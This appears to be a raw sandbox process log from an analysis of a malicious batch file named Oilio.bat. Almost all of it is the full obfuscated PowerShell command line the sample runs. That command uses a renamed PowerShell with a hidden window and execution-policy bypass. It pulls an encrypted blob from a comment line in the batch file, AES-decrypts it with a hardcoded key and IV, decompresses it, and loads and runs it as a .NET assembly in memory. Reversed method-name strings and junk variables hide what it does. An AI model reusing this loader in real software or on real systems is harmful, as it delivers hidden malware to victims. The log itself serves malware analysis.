cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "AuvpcXgt" C:\Users\test22\AppData\Local\Temp\Oilio.bat
3048net1.exe C:\Windows\system32\net1 file
2420Oilio.bat.exe "Oilio.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $urZHd = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\test22\AppData\Local\Temp\Oilio.bat').Split([Environment]::NewLine);foreach ($EFnMC in $urZHd) { if ($EFnMC.StartsWith(':: ')) { $OGzOA = $EFnMC.Substring(3); break; }; };$yIUDK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OGzOA);$aswXm = New-Object System.Security.Cryptography.AesManaged;$aswXm.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aswXm.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aswXm.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qneMroGqjggrncG0xD1xcKiXSXA85XDHECir8urE1+M=');$aswXm.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gcQez9Zv7eaIgRi2zxpN+A==');$kfDyP = $aswXm.CreateDecryptor();$yIUDK = $kfDyP.TransformFinalBlock($yIUDK, 0, $yIUDK.Length);$kfDyP.Dispose();$aswXm.Dispose();$OJbGi = New-Object System.IO.MemoryStream(, $yIUDK);$hPrzb = New-Object System.IO.MemoryStream;$aoQdl = New-Object System.IO.Compression.GZipStream($OJbGi, [IO.Compression.CompressionMode]::Decompress);$aoQdl.CopyTo($hPrzb);$aoQdl.Dispose();$OJbGi.Dispose();$hPrzb.Dispose();$yIUDK = $hPrzb.ToArray();$VVTzl = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($yIUDK);$yWkXW = $VVTzl.EntryPoint;$sdfweweefsd_var = $qwwfefdsf_var.EntryPoint;$sdfwewewefefsd_var = $qwwfefwefdsweff_var.EntryPoint;$sdfwewwefeefsd_var = $qwwfefwfwefwefdsf_var.EntryPoint;$sdfwewwefwefeefsd_var = $qwwfwwefefefdsf_var.EntryPoint;$sdfwewwfewefefsd_var = $qwwfefwefwefdsf_var.EntryPoint;$sdfwewfwqwefefefsd_var = $qwwfeweffwefdsf_var.EntryPoint;$sdfwewwfewfeefsd_var = $qwwfewfwefefdsf_var.EntryPoint;$sdfwewefwwfeefsd_var = $qwwfefwwfefdsf_var.EntryPoint;$sdfwewdefweefsd_var = $qwwfewewfffdsf_var.EntryPoint;$sdfwewsewefefsd_var = $qwwfefqdwefdsf_var.EntryPoint;$sdfwwef23eweefsd_var = $qwwfwefeerwfgfdsf_var.EntryPoint;$sdfwwef23deweefsd_var = $qwwfwedfwefefdsf_var.EntryPoint;$sdfwwef23feweefsd_var = $qwwfwefeeweffgdsf_var.EntryPoint;$sdfwwef23s12eweefsd_var = $qwwfwefewfeffdsf_var.EntryPoint;$sdfwwef23wefeweefsd_var = $qwwfwefefswfdsf_var.EntryPoint;$yWkXW.Invoke($null, (, [string[]] ('')))
1684